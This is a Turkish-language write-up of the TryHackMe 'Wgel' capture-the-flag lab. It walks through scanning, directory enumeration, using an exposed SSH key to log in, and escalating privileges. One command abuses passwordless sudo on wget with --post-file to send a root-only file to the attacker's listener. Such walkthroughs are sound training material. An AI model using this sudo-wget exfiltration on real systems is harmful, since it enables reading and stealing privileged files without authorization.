ZAFİYETLİ MAKİNE ÇÖZÜMÜ | TryHackMe Wgel CTF Writeup
https://tryhackme.com/room/wgelctf odanın makine çözümü hakkında bir yazı. İyi çalışmalar.
Oda çözümüne Nmap taraması ile başlayalım.
Yaptığımız tarama sonucunda 22/tcp ssh ve 80/tcp http servislerin açık olduğu görünüyor. Herkese açık olduğu için 80 numaralı bağlantı noktasındaki sunucuya bir göz atalım:
"Jessie web sitesini güncellemeyi unutma." şeklinde bir notla karşılaşıyoruz. Jessie daha sonra kullanabileceğimiz bir kullanıcı adı olabilir.
Kaynak kodundan başka bir şey çıkmadığı için bir de dizin taraması yapalım :
Sitemap adında bir dizin buluyoruz. Bu dizini kontrol ediyoruz ve bir şey çıkmıyor. Tekrar sitemap içinde bir dizin taraması yapalım :
Bu dizini kontrıol edelim:
Bir ssh id_rsa anahtarı bulduk. id_rsa'yı indirip, gerekli izinleri verelim. İzinleri vermek için aşağıdaki komutu kullanabilirsiniz :
- chmod 600 id_rsa
Şimdi bu id_rsa anahtarı ve Web sitesinde bulmuş olduğum kullanıcı adı ile ssh bağlantısı gerçekleştirmeyi deneyelim:
ssh bağlantısını başarılı bir şekilde gerçekleştirdik. Şimdi kullanıcı bayrağını bulalım :
Genellikle bayraklar .txt dosyalarında olur. Bulmak için find komutunu kullanalım.
- find / -type f -name *.txt 2>/dev/null
Bayrağımız Documents dizininin altındaymış. Documents dizinine gidip cat komutuyla bayrağımızı okuyalım.
user_falag.txt içindeki bayrağı bulmuş olduk.
Root bayrağını bulmamız için yetki yükseltmemiz gerekli. Bunun için sudo -l komutu ile root izini verilen komutlara bakalım.
/usr/bin/wget de şifresiz root olabileceğimizi görüyoruz. Bu açığı kullanabiliriz.
İlk olarak ncat ile kendi bilgisayarımızı dinlemeye alalım.
Karşı makineye şu komutu girelim :
- sudo /usr/bin/wget -post-file=/root/root_flag.txt TryHackMe'nin verdiği ip(vpn):dinlenecek por
wget dizinini kullandığımız için bizden şifre istemedi. Dinleme yaptığımız terminale giderek herhangi bir çıktı vermiş mi bakalım.
Ve root bayrağı karşımızda!! Böylelikle odayı tamamlamış olduk İyi çalışmalar...
